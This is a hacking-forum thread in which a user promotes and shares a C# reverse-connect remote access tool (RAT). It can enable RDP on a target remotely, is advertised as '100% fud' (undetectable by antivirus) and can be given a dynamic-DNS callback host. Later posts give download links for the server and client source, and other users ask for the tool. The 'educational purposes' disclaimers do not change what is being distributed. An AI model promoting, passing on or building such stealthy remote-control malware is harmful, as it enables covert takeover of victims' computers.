New RDP + Reverse Connect RAT c#

oxide
10 years ago

i have created a reverse command prompt remote admin tool that allows you to connect via rdp and enable rdp remotely

100% fud look

i can make this have a specific no-ip or dyddns name this is not for malicious purproses i take no responsibility for what you do with this as i am just making this for educational purposes it is not multi client to make it harder to abuse

27replies
15voices
850views
4images
[IAmDevil]
10 years ago

That looks like something good !!!
Good post !!!;)

oxide
10 years ago

ya it is im now able to make it async bro lol so now i have to work out some more kinks in the code than port the async code to this client as well as the main server and also it has lot of nice functions that will be getting updated this is my first try i barely have a clue how to write these but im trying ill release soon i hope

GB47
10 years ago

Great Work Brother
i like it
can you put the download link

oxide
10 years ago

actually i lost the code in a emergency format but i will redo it no big deal ill do it now

daMage
10 years ago

Any chance you’d share the source or the tool?

oxide
10 years ago

ok i am ready to let this go here you go boys be careful i take no responsibility for what you do with this it is only meant to demistify this process for a new hacker or to have fun in a lab dont use on anyone without permission as this voids any help i will give you not to be rude but i share for knowledge not destruction

oxide
10 years ago | edited 10 years ago

the server in c# visual studio 2010 no exe straight source baby

http://www.megafileupload.com/en/file/430239/ReverseRat-rar.html[/spoiler]

the client that has rdp capability and a reverse command prompt

[spoiler]http://www.megafileupload.com/en/file/430237/rdpratapp-rar.htmll

[d3adMaN]
10 years ago

cool man , I’m gonna take a look at this !!! (gotta learn c# first , :s glup)

oxide
10 years ago